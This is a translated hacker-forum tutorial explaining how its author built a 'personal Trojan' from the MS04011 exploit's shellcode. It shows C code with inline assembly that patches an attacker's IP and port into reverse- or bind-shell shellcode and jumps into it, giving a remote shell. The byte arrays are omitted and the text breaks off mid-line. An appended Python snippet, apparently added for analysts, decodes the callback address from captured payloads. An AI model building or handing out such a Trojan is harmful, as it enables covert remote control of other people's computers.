From MS04011 to Sunlion Personal Trojan V1.0
**********************************************************
Author: sunlion [EST]
Personal site: http://evilsun.126.com
Affiliated organization: China Evil Octal, http://www.eviloctal.com (forum: http://www.eviloctal.com/forum)
Reprint: please keep the author information
**********************************************************

A few days ago I saw someone who had written a reverse-connecting ("rebound") Trojan. I thought it was nice, so I wanted to write one too, but only when I actually sat down to write it did I discover that the program is not that simple. In fact I am a rookie, a very green rookie, and I couldn't do it, heh! Writing such a Trojan is really not easy. At first I imagined the program in three parts: one to create a Winsock connection to us, a second responsible for calling cmd.exe on the other computer, and a third, send.exe, responsible for calling the first program with parameters and sending the result back to us.
That was my idea, heh. But then I thought: can a program like this get privileges? Not at all; the privileges you get are not admin, so developing such a program at my current level did not look feasible! I am a rookie, but I have the courage and confidence to improve my abilities! Easy to say, but still not so easy to do! Later I remembered the source code of Winshell.exe, the work of Lonely Swordsman, a quite exquisite little program, so I got hold of the WinShell code. It basically contains WinShell's principle functions, and it uses some techniques I did not recognise, heh; it was really not easy. It uses a lot of functions I had to look up, and I looked up N of them, heh. I couldn't read it all in the dormitory, so in the end I printed it out, a whole 22 pages, heh! After reading the WinShell code I found that its principle is different from what I wanted, but reading the code was still a big harvest: for example there is a good part on how to write a Trojan as a system service, and so on. The code inside is really rich and very useful, haha! Finally I remembered the MS04011 overflow program. Everyone knows this exploit: as long as the other side has the MS04011 vulnerability, I run this program and use NC to listen on a port; the other side then connects back to my machine and we get a shell on it. Oh, what are you waiting for? So I browsed the code on the EST forum and finally found the MS04011 code in the last few pages, haha! Because it uses N more functions, I had to look them up as well, which was really tiring, heh, but I still finished it for my program, heh! Having written this far, I will only look at the parts I need and will not paste all of those posts. If you run into a function you don't know, go to the EST forum; there is a post in the C language section with the name:
Now let's start analysing the code: usage: expl
The beginning of this main function is not very important; what matters to me is the code analysed below ... (middle part of the program omitted). The relevant part starts here:

    if (argc > 4)   // check the number of parameters we entered; more than 4 means bind ("active") or reverse ("rebound") connection
        if (!memcmp(argv[4], "-t", 2)) opt = 1;   // if the parameters contain -t, opt == 1 and a port is bound;
                                                   // if there is no -t, opt == 0 (its initial value) and the shell connects back to our port
    if ((argc > 4) && !opt) {   // the program initialises opt to 0; if opt == 0 then !opt is true!
        port = htons(atoi(argv[3])) ^ (USHORT)0x9999;   // get the port
        ip = inet_addr(argv[4]) ^ (ULONG)0x99999999;    // get the IP we entered
        memcpy(&reverseshell[118], &port, 2);   // copy the port into the shellcode in memory
        memcpy(&reverseshell[111], &ip, 4);     // copy the IP into the shellcode in memory
        sc = reverseshell;   // use our defined reverseshell shellcode as sc
    } else {   // opt == 1, so -t was given: the bind-port type
        port = htons(atoi(argv[3])) ^ (USHORT)0x9999;   // get the port we entered
        memcpy(&bindshell[176], &port, 2);   // copy the port into the shellcode in memory
        sc = bindshell;   // use the bindshell shellcode section as sc
    }

Everyone who has read the program this far basically knows that MS04011 either binds a port or connects back to our computer, and that the important part is the two shellcodes defined above: unsigned char reverseshell[] and unsigned char bindshell[]. There is in fact a lot more code, which I will not analyse because I don't need it for writing my Trojan. Here we can summarise: whether MS04011 binds a port or connects back to our computer is determined by the shellcode. So what is shellcode, why can shellcode connect back to our computer, and how do we get a shell from it?
To be honest this is hard to explain clearly, because I don't fully understand it myself, heh! I looked it up: shellcode is generally delivered through an overflow, and when executed it has to call the target system's API, so shellcode needs a fairly general way to obtain the addresses of the target system's API functions. Secondly, because its runtime address is hard to determine, data must be addressed dynamically. In addition, shellcode is typically sent to the attacked target as data.
MS04011 takes exactly this form: it sends the shellcode to the other party. We want to use the shellcode as a Trojan, get the other side to run it, and have it build a Winsock connection to our computer; then we get privileges, and that is why we get a shell. There are two popular ways to write shellcode: write it in C and extract the bytes, or write it in assembly and extract the bytes. The MS04011 program embeds the two shellcodes we mentioned to achieve its goal.
Of course, shellcode is not something explained in a sentence or two. What is clear is that as long as we execute a specific shellcode we get privileges, and if so, we can treat the shellcode as a subroutine in assembly! So far we have the idea; how do we get the other party to execute our shellcode? Everyone who has studied assembly knows that a subroutine is executed with call PN (where PN is the label we define for the subroutine; this label is usually the subroutine's entry point, that is, the offset of the subroutine within the CS code segment in memory). So now we must make our Trojan execute this shellcode. Of course we cannot use call in VC, because it is an assembly instruction and VC has no such statement, so we have to embed assembly code in VC with __asm {} to execute the shellcode that is already loaded in memory. Haha, sunlion [EST] happened to have an assembly class this semester and also studied Win32ASM for a few days, and it finally came in handy here! OK, that is the principle! Now we write the Trojan. The shellcode is already there: it is reverseshell[] and bindshell[] from MS04011, and as long as we execute this code we get privileges. But you may wonder how MS04011 knows which port to bind, or where to connect back to? Those functions are contained in the shellcode itself, and that is why MS04011 takes parameters such as the IP and port and writes the extracted IP and port into the shellcode. (To put it plainly: if we don't write the IP and port into it, the shellcode will not know where to connect once it runs, so we have to write the IP and port into it, heh.) The other computer then executes the shellcode and creates a Winsock connection to the IP and port we set!
The main working principle of this Trojan is now out in the open, and friends who know programming have probably already started writing their own program. Below is mine, put before everyone; it is ugly :)! First, define the header files: #include
[The reverseshell[] byte array, taken from the MS04011 exploit, is omitted here; the port is inserted at offset 118 and the IP at offset 111.]

// bind shellcode: the shellcode used for the active (bind) connection; the port is inserted at offset 176
[The bindshell[] byte array, taken from the MS04011 exploit, is omitted here.]

Then comes the function part:

    void main(int argc, char *argv[])
    {
        unsigned short port;   // define the port
        // unsigned short stag;
        unsigned long ip;      // define the IP
        WSADATA wsa;
        WSAStartup(MAKEWORD(2, 2), &wsa);   // initialise Winsock, version 2.2
        if (argc == 2)   // decide whether we want a bind (active) or a reverse connection; argc == 2 means bind
        {
            port = htons(atoi(argv[1])) ^ (USHORT)0x9999;   // extract the port I entered
            memcpy(&bindshell[176], &port, 2);   // copy it into bindshell, already loaded in memory, at offset 176
            __asm   // now we call assembly
            {
                lea eax, bindshell   // get bindshell's address in memory
                jmp eax              // unconditional jump to bindshell, letting the system execute our constructed shellcode
            }
        }
        else if (argc == 3)   // this is the reverse connection I wanted
        {
            port = htons(atoi(argv[1])) ^ (USHORT)0x9999;   // extract the port
            ip = inet_addr(argv[2]) ^ (ULONG)0x99999999;    // extract the IP
            memcpy(&reverseshell[118], &port, 2);   // copy the port into the shellcode at offset 118
            memcpy(&reverseshell[111], &ip, 4);     // copy the IP into the shellcode at offset 111
            __asm
            {
                lea eax, reverseshell   // get the address, store it in eax
                jmp eax                 // jump there and execute
            }
        }
        else
            printf("Active connection usage: EvilSun
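For an analyst holding a captured copy of one of these payloads (from a memory dump or a network capture), the parameters the post describes can be read back out: the port is planted at offset 118 (reverseshell) or 176 (bindshell), the IP at offset 111, each XORed with 0x9999 / 0x99999999. The Python below is an added example, not code from the post or the exploit; it assumes that, as those masks imply, undoing the encoding is a per-byte XOR with 0x99, and the buffers it runs on are constructed NOP filler with the fields planted, not real shellcode.

```python
import socket
import struct

# Field positions and masks as they appear in the MS04011 exploit code quoted above.
REVERSE_IP_OFFSET = 111    # memcpy(&reverseshell[111], &ip, 4)
REVERSE_PORT_OFFSET = 118  # memcpy(&reverseshell[118], &port, 2)
BIND_PORT_OFFSET = 176     # memcpy(&bindshell[176], &port, 2)
XOR_BYTE = 0x99            # 0x9999 / 0x99999999 applied to the 2- and 4-byte fields


def decode_field(shellcode: bytes, offset: int, length: int) -> bytes:
    """Return `length` bytes at `offset` with the per-byte 0x99 mask removed.

    XORing the native short/long with 0x9999 / 0x99999999 equals XORing every
    stored byte with 0x99, and leaves the values in the network byte order
    that htons()/inet_addr() produced, so we decode byte-wise and parse as "!".
    """
    if len(shellcode) < offset + length:
        raise ValueError(f"buffer too short: need {offset + length} bytes, got {len(shellcode)}")
    return bytes(b ^ XOR_BYTE for b in shellcode[offset:offset + length])


def extract_reverse_config(shellcode: bytes) -> tuple[str, int]:
    """Recover (callback IP, callback port) from a reverseshell-variant buffer."""
    ip = socket.inet_ntoa(decode_field(shellcode, REVERSE_IP_OFFSET, 4))
    (port,) = struct.unpack("!H", decode_field(shellcode, REVERSE_PORT_OFFSET, 2))
    return ip, port


def extract_bind_port(shellcode: bytes) -> int:
    """Recover the listening port from a bindshell-variant buffer."""
    (port,) = struct.unpack("!H", decode_field(shellcode, BIND_PORT_OFFSET, 2))
    return port


def build_sample(variant: str, port: int, ip: str = "", length: int = 200) -> bytes:
    """Constructed test buffer (NOP filler, not real shellcode) with the fields
    planted exactly where the exploit's memcpy() calls put them."""
    buf = bytearray(b"\x90" * length)
    enc_port = bytes(b ^ XOR_BYTE for b in struct.pack("!H", port))
    if variant == "reverse":
        buf[REVERSE_IP_OFFSET:REVERSE_IP_OFFSET + 4] = bytes(b ^ XOR_BYTE for b in socket.inet_aton(ip))
        buf[REVERSE_PORT_OFFSET:REVERSE_PORT_OFFSET + 2] = enc_port
    else:
        buf[BIND_PORT_OFFSET:BIND_PORT_OFFSET + 2] = enc_port
    return bytes(buf)
```

The recovered address and port are what an incident responder would turn into network indicators; a buffer shorter than the expected offsets is rejected rather than misread.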